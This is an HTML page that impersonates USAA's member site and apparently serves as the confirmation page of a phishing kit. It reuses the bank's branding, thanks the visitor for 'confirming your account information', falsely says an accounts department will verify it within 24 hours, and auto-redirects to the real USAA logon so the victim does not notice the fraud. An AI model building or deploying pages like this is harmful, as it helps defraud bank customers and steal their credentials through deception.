
















<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<META HTTP-EQUIV="Refresh" CONTENT="5;URL=https://www.usaa.com/inet/ent_logon/Logon" >
	<meta http-equiv="Content-Style-Type" content='text/css' />
	
	
		<title>USAA - Member Access</title>
	 	<link rel="stylesheet" type="text/css" href="https://content.usaa.com/mcontent/static_assets/Includes/styles_member.css?cacheid=3526702913" media="all" />
			<link rel="stylesheet" type="text/css" href="https://content.usaa.com/mcontent/static_assets/Includes/styles_member_print.css?cacheid=644397621" media="print" /> 
	
	
</head>

<body>

	<div id="container">
		<a name="top"></a>
		<div id="header">
			
					<div id="logo"><a href="https://www.usaa.com/inet/ent_home/CpHome" class="logo" style=""><img src="https://content.usaa.com/mcontent/static_assets/Media/usaa_logo.png?cacheid=1714667076" width="53" height="55"  alt="USAA Member Home" title="USAA Member Home"/></a> <a href="https://www.usaa.com/inet/pages/security_center" class="security"><img src="https://content.usaa.com/mcontent/static_assets/Media/vh_securityMessage.gif?cacheid=3813010497" alt="usaa.com is a Secure Site"    title="usaa.com is a Secure Site"/></a></div>
				    <div id="navReference" style="position:absolute;top:5px;right:22px;z-index:10003;"><a href="https://www.usaa.com/inet/ent_logon/Logon">Log On</a> | <a href="https://www.usaa.com/inet/ent_contactus/CpLevelZeroContactUs?ContactUsPageId=PublicContactUs">Contact Us</a></div>
			
			
		</div>
		
			<div class="globalNavContainer">
				<div id="nav">
					<div id="globalNav">
						<ul id="navGlobal">
							<li class="active"><a  style="background-image:none;" href="https://www.usaa.com/inet/ent_logon/Logon?action=INIT"><img src="https://content.usaa.com/mcontent/static_assets/Media/navHomeActive.gif?cacheid=236284391" alt="Home" title="Home" /></a></li> 
							<li><a  style="background-image:none;" href="https://www.usaa.com/inet/pages/become_member_main"><img src="https://content.usaa.com/mcontent/static_assets/Media/navBecomeAMember.gif?cacheid=3489125172" alt="Become a Member" title="Become a Member" /></a></li> 
							<li><a  style="background-image:none;" href="https://www.usaa.com/inet/pages/products_services_main"><img src="https://content.usaa.com/mcontent/static_assets/Media/navProducts.gif?cacheid=1297678753" alt="Products & Services" title="Products & Services" /></a></li> 
							<li><a  style="background-image:none;" href="https://www.usaa.com/inet/pages/advice_planning_main"><img src="https://content.usaa.com/mcontent/static_assets/Media/navAdvice.gif?cacheid=3226499640" alt="Advice, Plans & Retirement" title="Advice, Plans & Retirement" /></a></li>  
						</ul>
					</div>
				</div>
			</div>
		
		<div id="content">
			<div id="toolsHeading"> 
	  			<h1>Welcome to USAA</h1>
	  		</div>
	  		<div id="main">
				
					<div class="messageInfo">
						Thanks for confirming your account information. We&#39;re proud to be able to serve you. 
						Your information will be verified by Accounts Management 
						Department in 24 hours. Please choose Member Access to continue.
					</div>
					<div class="buttonContainer">
						<span class="action"><button class="action" type="button" onclick="document.location='https://www.usaa.com/inet/ent_home/CpHome';">Member Access</button></span>
					</div>
				
					
			</div>
		</div>
		 <div class="noindex"> 
			<div id="footer">
				
					<div id="navUtility">
						<ul class="global">
							<li><a href="https://www.usaa.com/inet/pages/about_usaa_main"><img src="https://content.usaa.com/mcontent/static_assets/Media/navUtilAbout.gif?cacheid=2828628770" alt="ABOUT USAA"/></a></li><li><a href="http://www.usaa.apply2jobs.com/default.htm"><img src="https://content.usaa.com/mcontent/static_assets/Media/navUtilCareer.gif?cacheid=2349809018" alt="CAREERS"/></a></li><li><a href="https://www.usaa.com/inet/pages/security_center"><img src="https://content.usaa.com/mcontent/static_assets/Media/navUtilSecurity.gif?cacheid=483250253" alt="SECURITY CENTER"/></a></li>
						</ul>
						<ul class="sub">
							<li><a href="https://www.usaa.com/inet/ent_contactus/CpLevelZeroContactUs?ContactUsPageId=PublicContactUs">Contact Us</a></li><li><a href="https://www.usaa.com/inet/mc_faq/McFAQ?app=CpFaq&FAQPageID=CorpPublicFaq">FAQs</a></li><li><a href="https://www.usaa.com/inet/pages/site_terms_and_conditions_main">Terms & Conditions</a></li>
						</ul>
					</div>
				
				<div id="legalText">
					<div id="copyright"><p><span class="smallText">Copyright &copy; 2014 USAA. </span></p></div>
					<div id="legalText"></div>
				</div>
			</div>
		</div> 
	</div>

</body>

</html>
